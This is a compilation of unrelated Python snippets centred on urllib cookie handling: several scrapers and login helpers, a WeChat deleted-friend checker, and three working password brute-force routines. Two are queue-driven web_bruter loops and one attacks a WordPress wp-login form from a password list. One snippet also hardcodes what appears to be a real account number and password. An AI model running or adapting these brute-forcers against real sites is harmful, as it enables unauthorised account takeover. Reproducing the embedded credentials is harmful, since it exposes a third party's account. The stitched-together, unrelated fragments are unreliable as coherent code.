def fetion(msg):
    """Log in to the Fetion web service, send *msg* to oneself, then log out.

    Relies on module-level globals: user, password, loginstatus,
    url_login, url_msg, url_logout, and the module-level `re` import.

    :param msg: message text to send (str).
    """
    import http.cookiejar
    import urllib.parse
    import urllib.request

    cj = http.cookiejar.LWPCookieJar()
    opener = urllib.request.build_opener(
        urllib.request.HTTPCookieProcessor(cj))
    urllib.request.install_opener(opener)

    args = {'pass': password, 'm': user, 'loginstatus': loginstatus}
    print('Logining...')
    # POST data must be bytes on Python 3.
    req = urllib.request.Request(
        url_login, urllib.parse.urlencode(args).encode('utf-8'))
    jump = opener.open(req)
    page = jump.read().decode('utf-8', errors='replace')

    # Extract the redirect target and the session token from the WML page.
    url = re.compile(r'<card id="start".*?ontimer="(.*?);').findall(page)[0]
    arg_t = re.compile(r't=(\d*)').findall(page)[0]

    if url == '/im/login/login.action':  # redirected back to login => failed
        print('Login Failed!')
        input('Press any key to exit.')
        return
    else:
        print('Login Successfully!')

    sendmsg = urllib.request.Request(
        url_msg, urllib.parse.urlencode({'msg': msg}).encode('utf-8'))
    finish = urllib.request.urlopen(sendmsg)
    # BUG fix: geturl is a method; the original compared the bound method
    # object itself to a string, which is always False.
    if finish.geturl() == 'http://f.10086.cn/im/user/sendMsgToMyself.action':
        print('Send Failed!')
    else:
        print('Send Successfully')

    logout = urllib.request.Request(url_logout + arg_t)
    response = urllib.request.urlopen(logout)  # log out of the session
    print('Logout Successfully!')
def web_bruter(self):
    """Worker loop: pop candidate passwords off the queue and try each one
    against the target login form until a hit is found or the queue drains.

    Reads: self.password_q, self.found, self.target_get_form_url,
    self.target_post_form_url, self.parser_class, self.username,
    self.username_field, self.password_field, self.success_checker.
    Sets self.found on success.
    """
    import http.cookiejar
    import urllib.parse
    import urllib.request

    while not self.password_q.empty() and not self.found:
        brute = self.password_q.get().rstrip()
        # Fresh jar per attempt so session state never leaks between tries.
        # BUG fix: cookielib is the Python 2 name; use http.cookiejar.
        jar = http.cookiejar.FileCookieJar("cookies")
        opener = urllib.request.build_opener(
            urllib.request.HTTPCookieProcessor(jar))

        response = opener.open(self.target_get_form_url)
        # BUG fix: HTMLParser.feed expects str, not bytes, on Python 3.
        page = response.read().decode('utf-8', errors='replace')

        print(
            f"[*] Trying {self.username} : {brute} ({self.password_q.qsize()} Left)"
        )

        # parse out the hidden fields
        parser = self.parser_class()
        parser.feed(page)
        post_tags = parser.tag_results

        # add our username and password fields
        post_tags[self.username_field] = self.username
        post_tags[self.password_field] = brute

        # BUG fix: POST data must be bytes on Python 3.
        login_data = urllib.parse.urlencode(post_tags).encode('utf-8')
        login_response = opener.open(self.target_post_form_url, login_data)
        login_result = login_response.read()

        if self.success_checker(login_result):
            self.found = True
            print("[*] Bruteforce Successful!")
            print(f"[*] Username : {self.username}")
            print(f"[*] Password : {brute}")
            print("[*] Waiting for other threads to exit!")
def web_bruter(self):
    """Try queued passwords against the login form at module-level
    `target_url`/`target_post` until success or the queue is empty.

    Uses module-level globals: HC (http.cookiejar alias), BruteParser,
    target_url, target_post, username_field, password_field, success_check.
    """
    import urllib.parse
    import urllib.request

    while not self.password_q.empty() and not self.found:
        brute = self.password_q.get().rstrip()
        jar = HC.FileCookieJar('cookies')
        # BUG fix: build_opener/HTTPCookieProcessor live in urllib.request.
        opener = urllib.request.build_opener(
            urllib.request.HTTPCookieProcessor(jar))
        response = opener.open(target_url)
        # BUG fix: decode so BruteParser.feed and the substring check below
        # operate on str, not bytes, on Python 3.
        page = response.read().decode('utf-8', errors='replace')

        print('Trying:%s:%s(%d left)' %
              (self.username, brute, self.password_q.qsize()))

        parser = BruteParser()
        parser.feed(page)
        post_tags = parser.tag_result
        post_tags[username_field] = self.username
        post_tags[password_field] = brute

        # BUG fix: POST data must be bytes on Python 3.
        login_data = urllib.parse.urlencode(post_tags).encode('utf-8')
        login_response = opener.open(target_post, login_data)
        login_result = login_response.read().decode('utf-8', errors='replace')

        if success_check in login_result:
            self.found = True
            print('[*] Bruteforce successful.')
            # BUG fix: original printed the bare global `username`
            # instead of this instance's username.
            print('[*]Username:%s' % self.username)
            print('[*]Password:%s' % brute)
            print('[*]Waiting for other threads to exit...')
def __init__(self):
    """Set up a cookie-aware URL opener with a randomized User-Agent."""
    self.cookie_j = cookiejar.CookieJar()
    # Route all requests through a handler that records/replays cookies.
    processor = request.HTTPCookieProcessor(self.cookie_j)
    self.opener = request.build_opener(processor)
    # Pick a User-Agent at random per instance to vary the fingerprint.
    self.opener.addheaders = [('User-agent', random.choice(AGENTS))]
    # Subclass hook: run extra setup when the subclass defines init().
    if 'init' in dir(self):
        self.init()
def getJsonReponse(tweetCriteria, refreshCursor, cookieJar, proxy):
    """Actually obtains the tweets and returns an object that can be read.

    :param tweetCriteria: object whose optional attributes (username,
        querySearch, near/within, since, until, topTweets) build the query.
    :param refreshCursor: pagination cursor for the timeline endpoint.
    :param cookieJar: http.cookiejar jar reused across calls.
    :param proxy: optional "host:port" proxy for both http and https.
    :returns: decoded JSON dict from Twitter's search timeline.
    """
    url = "https://twitter.com/i/search/timeline?f=tweets&q=%s&src=typd&max_position=%s"
    urlGetData = ''
    if hasattr(tweetCriteria, 'username'):
        urlGetData += ' from:' + tweetCriteria.username
    if hasattr(tweetCriteria, 'querySearch'):
        urlGetData += ' ' + tweetCriteria.querySearch
    if hasattr(tweetCriteria, 'near'):
        urlGetData += "&near:" + tweetCriteria.near + " within:" + tweetCriteria.within
    if hasattr(tweetCriteria, 'since'):
        urlGetData += ' since:' + tweetCriteria.since
    if hasattr(tweetCriteria, 'until'):
        urlGetData += ' until:' + tweetCriteria.until
    if hasattr(tweetCriteria, 'topTweets'):
        if tweetCriteria.topTweets:
            # Top tweets use the endpoint without the f=tweets filter.
            url = "https://twitter.com/i/search/timeline?q=%s&src=typd&max_position=%s"

    url = url % (urllib.parse.quote(urlGetData), refreshCursor)
    headers = [('Host', "twitter.com"),
               ('User-Agent', "Mozilla/5.0 (Windows NT 6.1; Win64; x64)"),
               ('Accept', "application/json, text/javascript, */*; q=0.01"),
               ('Accept-Language', "de,en-US;q=0.7,en;q=0.3"),
               ('X-Requested-With', "XMLHttpRequest"),
               ('Referer', url),
               ('Connection', "keep-alive")]

    if proxy:
        # BUG fix: HTTPCookieProcessor lives in urllib.request; the original
        # used urllib.HTTPCookieProcessor here, which raises AttributeError.
        opener = urllib.request.build_opener(
            urllib.request.ProxyHandler({
                'http': proxy,
                'https': proxy
            }), urllib.request.HTTPCookieProcessor(cookieJar))
    else:
        opener = urllib.request.build_opener(
            urllib.request.HTTPCookieProcessor(cookieJar))
    opener.addheaders = headers

    try:
        response = opener.open(url)
        jsonResponse = response.read()
    except Exception:
        # Narrowed from a bare except so SystemExit/KeyboardInterrupt
        # propagate; network/HTTP errors still end the run.
        print(
            "Twitter weird response. Try to see on browser: https://twitter.com/search?q=%s&src=typd"
            % urllib.parse.quote(urlGetData))
        sys.exit()

    dataJson = json.loads(jsonResponse)
    return dataJson
def save_cookie(self, fileName, url):
    """Fetch *url* and persist the resulting session cookies to *fileName*.

    Must not run while another instance is active: it installs a global
    opener via urllib.request.install_opener.

    :param fileName: path for the Netscape-format cookie file.
    :param url: URL to request in order to obtain the cookies.
    """
    import http.cookiejar
    import urllib.request

    # MozillaCookieJar can serialize its cookies to a Netscape-format file.
    cookie = http.cookiejar.MozillaCookieJar(fileName)
    opener = urllib.request.build_opener(
        urllib.request.HTTPCookieProcessor(cookie))
    urllib.request.install_opener(opener)

    # BUG fix: the original called urllib.Request.open(url), which is not
    # an API; build a Request and fetch it through the installed opener.
    request = urllib.request.Request(url)
    request.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36')
    response = urllib.request.urlopen(request)
    print(response.getcode())

    cookie.save(ignore_discard=True, ignore_expires=True)
    print('Successfully saved')
def __init__(self):
    """Seed a Google Trends session and map widget names to CSV API URLs.

    Performs one live GET against trends.google.com to obtain cookies,
    then builds a cookie-carrying opener for subsequent API calls.
    """
    import urllib.request

    # requests' cookie jar is cookiejar-compatible, so it can back the
    # urllib cookie processor directly.
    self.cj = requests.get("https://trends.google.com/").cookies
    # BUG fix: build_opener/HTTPCookieProcessor live in urllib.request on
    # Python 3; urllib.build_opener raises AttributeError.
    self.opener = urllib.request.build_opener(
        urllib.request.HTTPCookieProcessor(self.cj))
    self.opener.addheaders = [
        ("Referrer", "https://trends.google.com/trends/explore"),
        ('User-Agent',
         'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.21 (KHTML, like Gecko) Chrome/19.0.1042.0 Safari/535.21'
         ),
        ("Accept", "text/plain")
    ]
    # Endpoints keyed by the widget title Google returns.
    self.api = {
        "Interest over time":
        'https://trends.google.com/trends/api/widgetdata/multiline/csv?',
        "Interest by region":
        'https://trends.google.com/trends/api/widgetdata/comparedgeo/csv?',
        "Related topics":
        'https://trends.google.com/trends/api/widgetdata/relatedsearches/csv?',
        "Related queries":
        'https://trends.google.com/trends/api/widgetdata/relatedsearches/csv?'
    }
    self.widgets = None
    self.widget_params = []
# -*- coding:utf-8 -*-
# Load previously saved CSDN cookies and fetch the profile page with them.
import http.cookiejar
import re
import urllib.request

import bs4
from bs4 import BeautifulSoup

# Jar instance that reads Netscape/Mozilla-format cookie files.
cookie = http.cookiejar.MozillaCookieJar()
cookie.load('cookies_csddn.txt', ignore_discard=False, ignore_expires=False)

# Impersonate a browser so the server accepts the request.
user_agent = 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'
headers = {'User-Agent': user_agent, 'Referer': 'http://my.csdn.net/'}
url = "http://my.csdn.net/"

# BUG fix: Request data must be bytes or None on Python 3; the original
# passed '' (a str), which raises TypeError. None keeps this a GET.
req = urllib.request.Request(url, None, headers)
# BUG fix: build_opener/HTTPCookieProcessor live in urllib.request.
opener = urllib.request.build_opener(
    urllib.request.HTTPCookieProcessor(cookie))
response = opener.open(req)
# BUG fix: print is a function on Python 3.
print(response.read())
def refresh(self):
    """Clear existing cookies, redo the CNKI search handshake, and return
    the rebuilt Cookie header string.

    Steps: (1) hit the default result page to collect session cookies,
    (2) log in, (3) submit the search options, (4) request page 1 of the
    result list and record the total page count in self.totalListPage.

    :returns: the cookie string also stored in self.cookie.
    """
    import time
    import urllib.parse
    import urllib.request
    from http import cookiejar

    cookie = cookiejar.CookieJar()
    # BUG fix: the original passed the *module* (cookiejar) instead of the
    # jar instance to HTTPCookieProcessor, so no cookies were recorded.
    opener = urllib.request.build_opener(
        urllib.request.HTTPCookieProcessor(cookie))

    def _open_with_retry(target):
        # Best-effort retry shared by all steps: on failure, sleep for the
        # configured interval and try exactly once more.
        try:
            return opener.open(target)
        except Exception:
            print("EXCEPTION(" + time.strftime("%Y-%m-%d %H:%M:%S") +
                  "):刷新Cookie时发生异常,休息" +
                  str(self.config.get("urlopenExceptRetryInterval")) +
                  "秒后重试")
            time.sleep(self.config.get("urlopenExceptRetryInterval"))
            return opener.open(target)

    # Step 1: collect ASP.NET_SessionId, LID, SID_kns cookies.
    _open_with_retry("http://epub.cnki.net/kns/brief/default_result.aspx")

    # Step 2: log in (timestamped to defeat caching).
    _open_with_retry("http://epub.cnki.net/kns/Request/login.aspx?&td=" +
                     str(int(time.time() * 1000)))

    # Step 3: submit the search options; POST data must be bytes.
    data = urllib.parse.urlencode(self.config.get('search')).encode('utf-8')
    self.config.set("Cookie", self.generateCookieString(cookie), "headers")
    headers = self.config.get("headers")
    request = urllib.request.Request(
        "http://epub.cnki.net/KNS/request/SearchHandler.ashx", data, headers)
    _open_with_retry(request)

    additional = {
        "RsPerPage": self.config.get("RecordsPerPage", "list"),
        "cnkiUserKey": self.generateCnkiUserKey()
    }
    self.cookie = self.generateCookieString(cookie, additional)

    # Step 4: request list page 1 to fix the search parameters server-side.
    data = urllib.parse.urlencode(self.config.get('listPageOne')).encode('utf-8')
    self.config.set("Cookie", self.cookie, "headers")
    headers = self.config.get("headers")
    request = urllib.request.Request(
        "http://epub.cnki.net/kns/brief/brief.aspx", data, headers)
    response = _open_with_retry(request)

    # Read the total page count out of the "current/total" text in the
    # countPageMark span, when present.
    soup = BeautifulSoup(response.read())
    if soup.find('span', {"class": "countPageMark"}):
        s = soup.find('span', {"class": "countPageMark"}).get_text()
        s = s.split("/")
        if len(s) >= 2:
            self.totalListPage = int(s[1])
    return self.cookie
def main():
    """Detect WeChat friends who deleted you by adding contacts to a
    throwaway group chat in batches and checking who cannot be added.

    Relies on module-level helpers (getUUID, showQRImage, waitForLogin,
    login, webwxinit, webwxgetcontact, createChatroom, addMember,
    deleteMember) and constants (QRImagePath, MAX_GROUP_NUM).
    """
    import http.cookiejar
    import math
    import os
    import time
    import urllib.request

    opener = urllib.request.build_opener(
        urllib.request.HTTPCookieProcessor(http.cookiejar.CookieJar()))
    urllib.request.install_opener(opener)

    if not getUUID():
        print('获取uuid失败')
        return

    showQRImage()
    time.sleep(1)

    while waitForLogin() != '200':
        pass
    os.remove(QRImagePath)

    if not login():
        print('登录失败')
        return
    if not webwxinit():
        print('初始化失败')
        return

    MemberList = webwxgetcontact()
    MemberCount = len(MemberList)
    # BUG fix: the original wrote print('…%s') % n, which applies % to
    # print's None return value and raises TypeError.
    print('通讯录共%s位好友' % MemberCount)

    ChatRoomName = ''
    result = []
    for i in range(0, int(math.ceil(MemberCount / float(MAX_GROUP_NUM)))):
        UserNames = []
        NickNames = []
        DeletedList = ''
        for j in range(0, MAX_GROUP_NUM):
            if i * MAX_GROUP_NUM + j >= MemberCount:
                break
            Member = MemberList[i * MAX_GROUP_NUM + j]
            UserNames.append(Member['UserName'])
            # BUG fix: keep str (not utf-8 bytes) so ', '.join below
            # works on Python 3.
            NickNames.append(Member['NickName'])

        print('第%s组...' % (i + 1))
        print(', '.join(NickNames))
        print('回车键继续...')
        input('say soemthing:')

        # Create the group on the first batch, then reuse it for the rest.
        if ChatRoomName == '':
            (ChatRoomName, DeletedList) = createChatroom(UserNames)
        else:
            DeletedList = addMember(ChatRoomName, UserNames)

        DeletedCount = len(DeletedList)
        if DeletedCount > 0:
            result += DeletedList
            print('找到%s个被删好友' % DeletedCount)

        # Remove this batch from the group before the next round.
        deleteMember(ChatRoomName, UserNames)
        # TODO: delete the group itself afterwards.

    resultNames = []
    for Member in MemberList:
        if Member['UserName'] in result:
            NickName = Member['NickName']
            if Member['RemarkName'] != '':
                NickName += '(%s)' % Member['RemarkName']
            resultNames.append(NickName)

    print('---------- 被删除的好友列表 ----------')
    print('\n'.join(resultNames))
    print('-----------------------------------')
# Demo: capture cookies from one request and reuse them for another.
import http.cookiejar
import urllib.request

# Jar instance that accumulates cookies from responses.
# BUG fix: cookielib is the Python 2 name; use http.cookiejar.
cookie = http.cookiejar.CookieJar()
# Cookie-aware handler, wrapped into an opener.
# BUG fix: HTTPCookieProcessor/build_opener live in urllib.request.
handler = urllib.request.HTTPCookieProcessor(cookie)
opener = urllib.request.build_opener(handler)
# open() behaves like urlopen and also accepts Request objects.
response = opener.open('http://www.baidu.com')
for item in cookie:
    print('Name = ' + item.name)
    print('Value = ' + item.value)

# Reuse the captured cookies for a second URL.
gradeUrl = 'http://www.baidu.com/xxx/xx'
result = opener.open(gradeUrl)
print(result.read())
def __init__(self, host, username):
    """Store target info and build a cookie-aware opener for wp-login.

    :param host: target hostname (no scheme).
    :param username: WordPress account name to brute-force.
    """
    import http.cookiejar
    import urllib.request

    self.username = username
    self.host = host
    self.http = 'http://' + host
    self.url = self.http + '/wp-admin/'
    self.user_agent = 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'
    self.referer = self.http + '/wp-login.php'
    self.cook = 'wordpress_test_cookie=WP+Cookie+check'
    # Preset headers (incl. WP's test cookie) so the server does not
    # reject the login POST outright.
    self.hraders = {
        'User-Agent': self.user_agent,
        "Cookie": self.cook,
        "Referer": self.referer,
        "Host": self.host
    }
    # BUG fix: 'buid_opener' typo, cookielib is the py2 module name, and
    # both helpers live in urllib.request on Python 3.
    self.cookie = http.cookiejar.CookieJar()
    self.opener = urllib.request.build_opener(
        urllib.request.HTTPCookieProcessor(self.cookie))

def crash(self, filename):
    """Try every password in *filename* against the WordPress login.

    A line that does not produce 'login_error' in the response is treated
    as the correct password; it is printed, written to wordprocess.txt,
    and the process exits.

    :param filename: path to a newline-separated password list.
    """
    import re
    import urllib.parse
    import urllib.request

    try:
        # 'with' closes the password file even on early exit / exception.
        with open(filename, 'r') as pwd:
            for line in pwd:
                candidate = line.strip()
                data = urllib.parse.urlencode({
                    "log": self.username,
                    "pwd": candidate,
                    "testcookie": "1",
                    # NOTE(review): self.redirect is never set in
                    # __init__ — confirm where it is supposed to come from.
                    "redirect_to": self.redirect
                }).encode('utf-8')  # POST data must be bytes on Python 3
                req = urllib.request.Request(url=self.url,
                                             data=data,
                                             headers=self.hraders)
                res = urllib.request.urlopen(req)
                result = res.read().decode('utf-8', errors='replace')
                # 'login_error' in the response body means this guess failed.
                if re.search(r'login_error', result):
                    continue
                print('crashed! passwd is %s %s' % (self.username, candidate))
                with open('wordprocess.txt', 'w+') as f:
                    f.write('crashed! passwd is %s %s' %
                            (self.username, candidate))
                # Password found: stop the whole run.
                exit()
    except Exception as e:
        print(e)
def _set_cookie(self, fileName):
    """Load cookies from *fileName* (Netscape/Mozilla format) and install
    a global cookie-carrying opener for subsequent urllib requests.

    :param fileName: path to the saved cookie file.
    """
    import http.cookiejar
    import urllib.request

    cookie = http.cookiejar.MozillaCookieJar()
    cookie.load(fileName, ignore_discard=True, ignore_expires=True)
    # BUG fix: build_opener/HTTPCookieProcessor live in urllib.request on
    # Python 3; urllib.build_opener raises AttributeError.
    opener = urllib.request.build_opener(
        urllib.request.HTTPCookieProcessor(cookie))
    urllib.request.install_opener(opener)
# Prepare a cookie-carrying session and build a login POST for os.ncuos.com.
import http.cookiejar
import re
import string
import urllib.parse
import urllib.request

hosturl = 'https://os.ncuos.com/api/user/token'
posturl = 'https://os.ncuos.com/api/user/token'

# BUG fix: module is http.cookiejar (original had 'cookieljar' typo), and
# the handlers live in urllib.request on Python 3.
cj = http.cookiejar.CookieJar()
cookie_support = urllib.request.HTTPCookieProcessor(cj)
opener = urllib.request.build_opener(cookie_support, urllib.request.HTTPHandler)
urllib.request.install_opener(opener)

# Prime the session cookies with a plain GET first.
h = urllib.request.urlopen(hosturl)

headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36',
           'Referer':'https://os.ncuos.com/api/user/token'}
postData = {'op' : 'dmlogin',
            'f' : 'st',
            'user' : '8002118162',
            'pass' : '200617',
            'rmbr' : 'ture',
            'tmp' : '0.0008502006530761719s'
            }
# BUG fix: urlencode lives in urllib.parse (original wrote
# urllib.urllib.urlencode), and POST data must be bytes on Python 3.
postData = urllib.parse.urlencode(postData).encode('utf-8')
request = urllib.request.Request(posturl, postData, headers)